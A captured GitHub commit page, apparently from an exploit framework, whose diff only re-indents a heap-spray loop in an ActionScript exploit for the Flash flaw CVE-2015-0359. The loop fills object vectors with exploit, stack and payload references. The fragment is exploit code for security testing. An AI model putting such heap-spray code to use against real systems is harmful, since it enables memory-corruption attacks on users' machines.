We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 7202e27 commit 1d05ce1Copy full SHA for 1d05ce1
external/source/exploits/CVE-2015-0359/Exploiter.as
@@ -54,11 +54,11 @@ package
54
Logger.log("[*] Exploiter - spray_objects()")
55
for (var i:uint = 0; i < spray.length; i++)
56
{
57
- spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
58
- spray[i][0] = eba.ba
59
- spray[i][1] = exploit
60
- spray[i][2] = stack
61
- spray[i][3] = payload_space
+ spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+ spray[i][0] = eba.ba
+ spray[i][1] = exploit
+ spray[i][2] = stack
+ spray[i][3] = payload_space
62
}
63
64
0 commit comments